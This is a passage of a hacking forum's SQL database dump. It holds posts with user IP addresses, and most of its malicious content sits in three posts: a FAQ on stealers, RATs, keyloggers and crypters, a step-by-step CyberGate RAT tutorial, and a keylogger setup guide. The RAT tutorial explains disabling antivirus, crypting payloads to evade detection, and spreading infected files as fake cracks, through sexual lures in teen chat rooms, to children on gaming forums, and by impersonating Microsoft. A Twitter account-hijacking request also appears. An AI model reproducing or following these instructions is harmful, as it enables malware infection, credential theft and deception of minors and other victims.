but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file\'s access is restricted. [color=#FFD700]Q: What is a virus/trojan/malicious script?[/color] [color=#98FB98]A:[/color] A computer virus is a computer program that can copy itself and infect a computer. The term \"virus\" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.. [color=#FFD700]Q: What is a stealer?[/color] [color=#98FB98]A:[/color] A stealer is a software designed to create viruses. This virus is called as a server. You send the server to the victim and if they open it all their passes (according to how the stealer is built) will be sent to you via email, or ftp or a php webhost. [color=#FFD700]Q: What is a RAT?[/color] [color=#98FB98]A:[/color] A Rat is a software created that created similar servers (virus). If the victim opens it they will be your RAT. You can have a complete access to their system. There are hundereds of features. RAT - Remote Administration Tool. [color=#FFD700] Q: What is a keylogger?[/color] [color=#98FB98]A:[/color] A keylogger is a software designed to create servers. You send the server to the victim and if they open it all their keystrokes would be sent you via email, ftp, php webhost etc. [color=#FFD700]Q: What is BOT?[/color] [color=#98FB98]A:[/color] A bot is a malicious program which has several purposes. They are usually told what to do by a botnet admin although many of the features now are automated. [color=#FFD700]Q: What is a BOTNET?[/color] [color=#98FB98]A:[/color] A botnet is a network of infected computers that all connect to one area where they are commanded by the botnet admin. [color=#FFD700]Q: What is a crypter?[/color] [color=#98FB98]A:[/color] All your servers that you create of a keylogger, stealer, RATs etc. are detected by antivirus. So inorder to make it FUD (Fully UnDetectable) we use a crypter and crypt your infected server. [color=#FFD700]Q: How does a crypter work?[/color] [color=#98FB98]A:[/color] A crypter has a built in or external file called stub. This stub is based on common encryptions like rc4, xor, tweafish, blowfish etc. When you crypt your infected file the crypter embeds the stub onto your server and covers the server. Just like how you paint your rusted metals. And makes it undetectable from anti-virus. [color=#FFD700]Q: What is reverting?[/color] [color=#98FB98]A:[/color] Reverting is a technique used to obtain forgotten passwords. But a hacker uses this method to access the victims account. [color=#FFD700] Q: What is social engineering?[/color] [color=#98FB98]A:[/color] It is a psychological approach, where you manipulate people into performing actions or divulging confidential information, rather than by breaking in or using technical hacking techniques (essentially a fancier, more technical way of lying). [color=#FFD700] Q: What is DDos?[/color] [color=#98FB98]A:[/color] DOS - Denial Of Service. This is using bots. If you have a large number of bots you make them send packets to the target site and make them break down. [color=#FFD700]Q: How is website and forum hack possible?[/color] [color=#98FB98]A:[/color] There are lots of methods. The most basic one is you find exploits on a webserver and use them to gain access and deface it. Sql, XSS, LFI, RFI, DNS poisoning etc. [color=#FFD700]Q: Can everyone be h4k5er?[/color] [color=#98FB98]A:[/color] No, u need a brain and common sense. [color=#32CD32]Copyright and credits By ProVirus [/color]', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '9d252f85d853dc69943b62ed232b0d8c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('920', '227', '0', '13', 'hack twitter?', '0', '62', 'R?????zo?', '1345910796', 'anybody knows how to hack twitter? this kid is messing up with my gf and saying stuff about me, i would like to fuck up his twitter account/delete what he said.', '89.214.202.231', '1507248871', '1', '0', '0', '0', '1', 'a39a7dcf6f09e1a29143ba522cceadec', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('921', '228', '0', '12', '[TUT] A complete guide to RAT', '0', '54', 'Sin Cara', '1345911097', 'Let\'s begin off by understanding what is this process of Ratting. [color=#FF6347]What is RAT?[/color] RAT stands for Remote Access Tool. It allows to access a system remotely without having physical access to the system. It is basically a service that is available in Windows OS known as remote services. It is used to connect to the network system remotely. Simple Remote Desktop Connection and RADIUS servers are the two common methods of doing this. So we will exploit this service to get unauthorized access. There are many famous tools that allows us to do the following like blackshades, crybergate, cerberus, turkojan etc. So here we will be discussing about cybergate. [color=#FF6347] So how will cybergate work?[/color] In cybergate you can create servers (infected exes). If you victim opens this file you will be able to RAT him. [color=#FF6347]Will the server(infected file) that I create will be picked up by Anti-Virues?[/color] Yes, it will be. You will need to crypt is using a crypter or use other methods like Hexing. Oki so lets get to the practical part:- [IMG]http://www.auplod.com/u/daluop16abc.png[/IMG] So lets create the no-ip account first. [color=#FFD700][size=large]I - Create No-IP Account:-[/size][/color] [spoiler]1) Goto [url=http://www.no-ip.com]No-IP.com[/url] and register and account. 2) Login to your account. 3) Click on this [img]http://www.picsend.net/images/294525PBEWPXOMNXMBFVXI.jpg[/img] 4) Keep the same setting as in the picture. And click on create host. [spoiler][img]http://www.picsend.net/images/609606RHMCIKBRVKTZFOSF.jpg[/img][/spoiler] 5) Now goto [url=https://www.no-ip.com/downloads.php]this page[/url] and download the no-ip client. 6) Open the downloaded client and install it. 7) Open the installed No-IP Duc client. 8) Now give in your login details and you will see the created host. 9) Remove the checkbox and again check it. [spoiler][img]http://www.picsend.net/images/4978UOXHKZRVLHDTYGTP.jpg[/img][/spoiler] 10) Minimize your no-ip duc Remember you always need to open your no-ip client and click the check box to get [img]http://www.picsend.net/images/224520JQBMVXNNSHJJJGFZ.jpg[/img] smiley whenever you are going to control your RATs.[/spoiler] [color=#FFD700][size=large]II - Port Forwarding:-[/size][/color] [spoiler]What is Port Forwarding? Ans:- Port forwarding or port mapping is the forwarding of a TCP/IP packet in a network address translator gateway to a predetermined network (which will be our No-IP Account) Methods:- [u]a) Goto [url=http://www.crackhackforum.com/thread-3993.html]this tutorial[/url] and follow the steps. Thanks to lyle for this tutorial.[/u] [u] b) The hard way but better if you need to learn.[/u] 1) Find out your gateway. 2) Goto Start----> Run 3) Type in \"cmd\" 4) Now type \"ipconfig\" and click enter 5) And you will get the gateway IP. [spoiler][img]http://www.picsend.net/images/27648VIQRLLTGDGAWIUFY.jpg[/img][/spoiler] 6) Now type the gateway IP in your web browser. 7) It will ask for username and password. 8) You can find your username and password from a sticker behind your router. Most of the time the user and pass will be \"admin\". 9) After successful login to your router you will be able to see options for portfowarding. 10) Forward port \"100\" to your local IP. If you need some more help to do this you need to goto [url=http://portforward.com/english/routers/port_forwarding/routerindex.htm]this link[/url] and select your router and check for a tutorial there. To check whether port \"100\" is open. Goto [url=http://www.canyouseeme.org]this link[/url] and type in port 100 and check the result. [/spoiler] [color=#FFD700][size=large]III - Creating a server:-[/size][/color] [spoiler] 1) Close your anti-virus. Since this type of virus/trojan builders are detected by anti-viruses as a false positive. 2) Download [url=http://www.fileserve.com/file/WdfHCCx]this link[/url]. 3) Unrar/Decompress it and open \"CyberGate v1.07.5.exe\" 4) Wait for 20 seconds untill the disclaimer notice is scrolled over. 5) Click on Control Center and click \"Start\". 6) A box will pop up. Give the settings as in the picture below [spoiler][img]http://www.picsend.net/images/586306PLHXEWOPBXUITEZZ.jpg[/img][/spoiler] 7) If any Windows Firewall box pops up click \"Allow access\". 8) Goto Control Center -----> Builder ----> Create Server. 9) A new box pops up. Click \"Add User\". Type in a username. 10) Double click the created username. 11) Follow the below pic. [spoiler][img]http://www.picsend.net/images/459379CJBYENPOUVOEQKUB.jpg[/img][/spoiler] 12) Follow this pic. [spoiler][img]http://www.picsend.net/images/208659OGSZZRPFBHJJFFRO.jpg[/img][/spoiler] 13) Follow the next pic [spoiler][img]http://www.picsend.net/images/87672OKRYKFLGZHBZIUHQ.jpg[/img][/spoiler] 14) Follow the below pic. [spoiler][img]http://www.picsend.net/images/551972VBJBUBUJBPKFZYIV.jpg[/img][/spoiler] So you created a server binded to some file. [/spoiler] [color=#FFD700][size=large]IV - Crypting the created server:-[/size][/color] [spoiler]The server that you created will be detected by lots of anti-viruses. You need to get it FUD (Fully UnDetectable) by crypting it with a crypter or by using other methods like hexing. Iam not going in detail about it on this thread. You could buy a good FUD crypter and crypt your server which will be the easy method.[/spoiler] [color=#FFD700][size=large]V - Spread your server:-[/size][/color] [spoiler]Now its all set, you need to spread the server. 1. [color=#FFD700][size=medium]Youtube[/size][/color] - YouTube is a video sharing website on which users can upload and share videos, millions of people are online... Now , make a video bout a crack , like For Adobe Photoshop , VB.Net , Teamviewer ,(These were just the examples) or any Games , then get your virus FUD(recommended) and Make a video and post. Now , i know alot of people do this , but they dont do 1 thing right. SPreading the video. How to do this??? GO to [url]www.youtube.com[/url] and click on Videos , then click on Most Viewed , and then choose All Time Then go to every single video that has alot of views and post this: Wow look what i found click on my name and watch the video , it will get ur free shit etc etc.. . Then you will get loads of people infected. 2.[color=#FFD700][size=medium]Torrents[/size][/color] - This is the most effective way. First you need a torrent client, I use uTorrent, because it\'s the easiest.Once you get your torrent client, Get some fake stuff , like Steam games Keygen or Cracks or w/e and then put them in a .rar file and put the keylogger on it. (BIND IT) . Now you gotta create the torrents.Open uTorrent , and then go to File -> Create New Torrent And add your .rar file on it, okay so now trackers are needed... These are some good ones: Then click START SEEDING. Now .. CLick Create -> Save AS... and save anywhere u want After you saved , go to [url]www.thepiratebay.org[/url], Register and upload your torrent 3.[color=#FFD700][size=medium]Chat Rooms[/size][/color] - This is slow but you get adult people ( You can get credit cards and paypals from this). First of all , go to any chat room from any of these below: [quote]1.[url]http://www.chat-avenue.com/teenchat.html[/url] 2.[url]http://www.chat-avenue.com/adultchat.html[/url] 3.[url]http://www.321teenchat.com/[/url] 4.[url]http://www.javachatrooms.net/[/url] 5.[url]http://www.freechatnow.com/[/url][/QUOTE] And then , upload your file to any free file hosting such as sharesend and then go to chat rooms , and start spamming \"16/F/uk huge boobs wanna see my naked pics ? go here <insert link> and tell me if u like it!! OR Spam this: Add me on msn will send u naked pics of me <ur msn here> im hornyyy xxx And after they add u send link from there ( this is a better method than the first one .. but this is a lil boring) 4.[color=#FFD700][size=medium]Forums[/size][/color] - I used to do this when i first started using keyloggers , it was pretty fun actually. [color=#FF6347]NEVER TRY IT ON CRACK HACK FORUM[/color] :cool: First you go to any gaming forum such as [url]www.mpgh.net[/url] and create a new thread with the name \"Free All In One CrossFire HACK\" and then post a fake virus scan of ur file and put download link , you will get alot of 12-17 years old kids who play all day RPG games... 5.[color=#FFD700][size=medium]Impersonating Microsoft[/size][/color] - This one doesnt work very well , but you can use this for targeting. First of all go to [url]www.passport.net[/url] and make a @microsoft.co.uk email... then , add someone you want on that msn and tell him : A new virus has been detected , for your safety , we need you to download this file < LINK> or else your computer may be in danger. [/spoiler] Hope you understand about RATing from this tutorial. [b] Credits to :[/b][color=#DAA520]ProVirus[/color]', '173.245.53.158', '-1376438882', '1', '0', '0', '0', '1', '39215239d290f36cac93ad4629d7e52d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('922', '2', '4', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1345912169', '[img]http://i.imgur.com/rKDZL.png[/img] My results. Changes some stuff up. This will probably be my Usergroup Name. Unique?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68367171f5f1829777b24f3c1b3b0240', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('923', '229', '0', '12', 'How to setup a Keylogger [tut]', '0', '53', 'sirchamp', '1345913509', 'Since there wasnt any Tutorial on setting your own Keylogger up, I decided to make one. My favourite Keylogger is the Project Neptune one. [size=x-large][color=#FF0000]Tutorial:[/size][size=medium][/color][color=#FFFFFF] 1. Download the Keylogger here : http://project-neptune.net/download/ 2. Save the file somewhere and start the Project Neptune.exe 3. Now choose the settings you want. [img]http://i45.tinypic.com/2hz62it.jpg[/img] 4. Here you can leave the settings as they are [img]http://i47.tinypic.com/34g226s.jpg[/img] 5. Here you can also leave the settings here. [img]http://i47.tinypic.com/34q1h83.jpg[/img] 6.Here Write an error message here and choose the settings you want. [img]http://i46.tinypic.com/2ljltlf.jpg[/img] 7. Press the buttons as on the picture: [img]http://i50.tinypic.com/zshag.jpg[/img] 8. And save the file wherever you want and name it wathever you want. [img]http://i50.tinypic.com/sqrsyf.jpg[/img] 9. Now go to your file and upload it to somewhere. And spread the link. You will reacive the keylogg text files under the email you chose in step 3. 10. And as soon as someone has downloaded the virus on his computer you should get an email with his information and all the keylogged stuff . [img]http://i48.tinypic.com/347f9lw.jpg[/img][/color][/size] Tutorial by sirchamp', '188.155.56.90', '-1130678182', '1', '0', '53', '1345913562', '1', 'b752297a177a5e4a8d4af7ddf6f0fe4a', '0', '1345913562'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('924', '195', '688', '39', 'RE: [Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1345916462', 'Updated thread. Added Thread Design. xD I failed at the Contact Info part.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d5c19f75ce2eac48284c9d354662f72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('925', '230', '0', '34', 'Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345917649', '[color=#006400][b]Tutorials List:[/b][/color] http://psd.tutsplus.com/ http://photoshoptutorials.ws/ http://www.tutorialized.com/tutorials/Photoshop/1 http://www.good-tutorials.com/tutorials/photoshop http://www.planetphotoshop.com/category/tutorials http://www.sketchpad.net/photoshp.htm http://www.luv2help.com/ http://www.goodtutorials-ps.com/ http://www.tutorialhero.com http://www.pixel2life.com http://www.zymic.com http://www.sigvault.com http://www.interfaceuniversity.com (Interface Tutorials) http://artwiki.wikidot.com/ http://www.eyesondesign.net/pshop/tuts.htm (Mostly Interface) http://www.photoshopguides.com/tutorial-1143 http://www.melissaclifton.com/ (Vector Tutorials) http://dr-photoshop.com/ http://www.showandtell-graphics.com/ http://www.visualdesigncore.com/tutorials/ http://www.heathrowe.com/ http://www.tutorialized.com http://www.photoscape.org/ http://www.pixel2life.com/ http://www.tutorialized.com/tutorials/Photoshop/1 http://www.planetphotoshop.com/ http://www.photoshopcafe.com/ http://www.entensity.net/ http://www.mlhotw.com/ http://www.photoshoproadmap.com/ http://www.photoshopuser.com/ http://home.no.net/poek/ http://www.somethingleet.com/ http://www.actionfx.com/ http://dazulu.r4ge.com/ http://www.genarts.com/sapphire-ae-tutorial.html http://tutorial-index.com/ http://www.photoshopsupport.com/tutoriaÃ...op-10.html http://www.photoshopsupport.com http://www.tutorialkit.com/ http://www.grafx-design.com/phototut.html http://www.photoshopstar.com/ http://www.sketchpad.net/photoshp.htm http://www.tutorialgod.com/ http://www.hypergurl.com/index.html http://www.tutvid.com Stocks/renders: http://www.sxc.hu/ http://www.planetrenders.net http://www.clantemplates.com/renders http://www.gamewallpapers.com http://www.renders-graphiques.fr/ Brushes/Textures: http://www.deviantart.com http://photoshopbrushes.com/brushes.htm http://www.psbrushes.net/ http://www.dr-depot.com http://deviantart.com/ http://brushes.echoica.net/ http://www.misprintedtype.com/ http://qtone.sidez.net/ http://www.magurno.com/ http://www.brusheezy.com http://www.psbrushes.net/ Skins: http://www.clantemplates.com/ http://www.freewebtemplates.com/ Fonts: http://dafont.com http://www.1001freefonts.com/ http://www.coffeecup.com/freestuff/fonts/ http://www.acidfonts.com/ http://www.gimmefonts.com/ http://simplythebest.net/fonts/ http://www.fontshop.com/freefonts/ http://www.smackbomb.com/famousfonts/ http://www.fontspace.com/ http://www.fontparade.com http://www.urbanfonts.com/ Image Editor: http://www.lunapic.com/editor http://www.puricute.com/ http://www.photoscape.org IMAGE HOSTING: http://imagevenue.com/ http://www.imagehosting.com/ http://www.picoodle.com/ http://imageshack.us/ http://tinypic.com/ http://www.freeimagehosting.net/ http://www.supload.com/ http://photobucket.com/ http://www.picgames.com/forum/myspace-image-help.php http://www.theimagehosting.com/ http://www.bigoo.ws/ http://www.turboimagehost.com/ Everything: http://www.tutorialkit.com/ http://officialpsds.com/ http://www.2dvalley.com/ [color=#DAA520][b]Credits to :[/b][/color] Anonymouse', '119.154.17.141', '2006585741', '1', '0', '54', '1345942389', '1', '5f4ae24a216f72a850d61059ce60f77e', '0', '1345942389'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('984', '230', '944', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345942431', '[quote=\'iTzIpod\' pid=\'944\' dateline=\'1345922950\'] [quote=\'Sin Cara\' pid=\'934\' dateline=\'1345918850\'] [quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\'] Alright There are probably more. Some links are unknown Some links are broken. [Spoiler] http://www.ajoyfulheart.com/pspphot...shresources.htm http://www.smashingmagazine.com/2007/01%C3%83...tutorials/ http://graphicssoft.about.com/od/illust%C3%83...lrings.htm http://www.adobe.com/support/fireworks/%C3%83...index.html http://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts [/Spoiler] [/quote] The links are dead because of server is down. [/quote] Adobe is down? Are you sure? It is up. It doesn\'t work because of the ... in the URL. -.- Fix them [/quote] The dead links are removed now ;)', '119.154.77.132', '2006601092', '1', '0', '0', '0', '1', 'c59266d45e27a61110f3c230758be23e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('926', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345917879', 'Fail copy and paste. Some of the links have the .... in it. So you have to fix them ^_^.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc9179d0196aa46c68133db92c772fa9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('928', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345918241', 'Right after this stopped working i got it working again. But it stopped working again O.o', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b2cd2bbaee93a05dfd0a612033e771c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('929', '231', '0', '4', 'Sup', '0', '127', 'Eucliwood', '1345918274', 'yo, im Eu and i like potatoes', '88.90.14.9', '1482296841', '1', '0', '0', '0', '1', '85f88cd4916b11b7fdad359ceccaf510', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('930', '212', '909', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1345918349', '[quote=\'Sin Cara\' pid=\'909\' dateline=\'1345906750\'] So are you going to make it official???? [/quote] t3h jok3r is probably busy today. OT: [b]Name of group:[/b] Unique [b]Group Description:[/b] We are Unique. We are a HQ Group. And we have the best HQ members. [b]Group Userbar:[/b] [img]http://i.imgur.com/rKDZL.png[/img] [b]Forum Name:[/b] Unique Headquarters [b]Forum Icon(34x34):[/b] [img]http://www.blackboard.com/resources/mobile/images/coursemap_icons/MLForumsIcon.png[/img] [b]Why LH should make this group official:[/b] LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity.', '24.212.197.164', '416597412', '1', '0', '82', '1345918453', '1', '639e5b1c87f5cd801d4c548d14f0779b', '0', '1345918453'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('931', '231', '929', '4', 'RE: Sup', '0', '67', 'HoverCatz', '1345918468', 'Hey, nice to meet u. Welcome to L33thacking :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'fdf8e810cc16a3c347b9aea458692714', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('958', '231', '929', '4', 'RE: Sup', '0', '1', 't3h jok3r', '1345936312', 'Welcome to L33THacking. We do not not allow adult content in Signatures, Posts or via Profile. Your signature privilege has been suspended for two days.', '41.174.24.78', '699275342', '1', '0', '0', '0', '1', 'a4b7feb621cd48bdbdbc3625bd63d9e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('933', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '82', 'iTzIpod', '1345918590', 'Alright There are probably more. Some links are unknown Some links are broken. [Spoiler] http://www.ajoyfulheart.com/pspphot...shresources.htm http://www.smashingmagazine.com/2007/01%C3%83...tutorials/ http://graphicssoft.about.com/od/illust%C3%83...lrings.htm http://www.adobe.com/support/fireworks/%C3%83...index.html http://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts [/Spoiler]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44a4bbfe36b2843fb6ccadaa9724fd85', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('934', '230', '933', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345918850', '[quote=\'iTzIpod\' pid=\'933\' dateline=\'1345918590\'] Alright There are probably more. Some links are unknown Some links are broken. [Spoiler] http://www.ajoyfulheart.com/pspphot...shresources.htm http://www.smashingmagazine.com/2007/01%C3%83...tutorials/ http://graphicssoft.about.com/od/illust%C3%83...lrings.htm http://www.adobe.com/support/fireworks/%C3%83...index.html http://www.webpagepublicity.com/free-fo%C3%83...ee%20Fonts [/Spoiler] [/quote] The links are dead because of server is down.', '173.245.53.115', '-1376438925', '1', '0', '0', '0', '1', 'e59551697daf449d257f9b5e9c744d72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('935', '231', '929', '4', 'RE: Sup', '0', '82', 'iTzIpod', '1345918976', 'Hey. Welcome to LH! Once a L33t, Always a L33t. That\'s our motto. Enjoy your stay! Please be active and read and stick to the rules. It will make everyone\'s life easier. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3333f31f89fb31c79a3159146173bce9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('936', '228', '921', '12', 'RE: [TUT] A complete guide to RAT', '0', '55', 'Baws', '1345919168', 'Nice, it\'d be better if you mention there are other known RATs such as Darkcomet which is stable but a discontinued project, and Blackshades which is $40 but its owner was arrested so it is most likely under FBI surveillance.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '65645c3b4350605b2d803dc32d600dab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('937', '229', '923', '12', 'RE: How to setup a Keylogger [tut]', '0', '55', 'Baws', '1345919217', 'You also need to crypt the server so that antiviruses won\'t catch it.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '09a3d6bd23216ee3d66e95ad39d25493', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('938', '2', '922', '34', 'RE: Userbar tut', '0', '55', 'Baws', '1345919297', '[quote=\'iTzIpod\' pid=\'922\' dateline=\'1345912169\'] [img]http://i.imgur.com/rKDZL.png[/img] My results. Changes some stuff up. This will probably be my Usergroup Name. Unique? [/quote] In my opinion the text is kind of hard to read.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'c2f67850b68e47789419b0fcb90aeda4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('939', '228', '936', '12', 'RE: [TUT] A complete guide to RAT', '0', '54', 'Sin Cara', '1345919307', '[quote=\'Baws\' pid=\'936\' dateline=\'1345919168\'] Nice, it\'d be better if you mention there are other known RATs such as Darkcomet which is stable but a discontinued project, and Blackshades which is $40 but its owner was arrested so it is most likely under FBI surveillance. [/quote] These are the basic rats ;)', '173.245.53.115', '-1376438925', '1', '0', '0', '0', '1', '343acad8dd7b1b6e534f4f10fefb92f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('940', '224', '907', '34', 'RE: [Tutorial][Leaked] Metroid Signature Tutorial', '0', '55', 'Baws', '1345919393', 'I\'m not sure if this is against the rules, or a nice thing to do. It does say DO NOT RIP. Other than that, thanks for the post.', '98.176.49.100', '1655714148', '0', '0', '55', '1345919408', '1', '0ce0678dd85921755e7a94c725a8ae96', '0', '1345919408'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('941', '227', '920', '13', 'RE: hack twitter?', '0', '67', 'HoverCatz', '1345920388', 'I dont think its possible for people like us :S u gotta be like Super Mega ultra haxor', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '16b50fd070fdc172e8daa7c6281ef3d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('942', '224', '940', '34', 'RE: [Tutorial][Leaked] Metroid Signature Tutorial', '0', '82', 'iTzIpod', '1345922749', '[quote=\'Baws\' pid=\'940\' dateline=\'1345919393\'] I\'m not sure if this is against the rules, or a nice thing to do. It does say DO NOT RIP. Other than that, thanks for the post. [/quote] I didn\'t really rip it. I did say that it was leaked in the title. And also I gave the link to the Deviant Art page.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '633242ddd1949408567d3497bc4f1235', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, 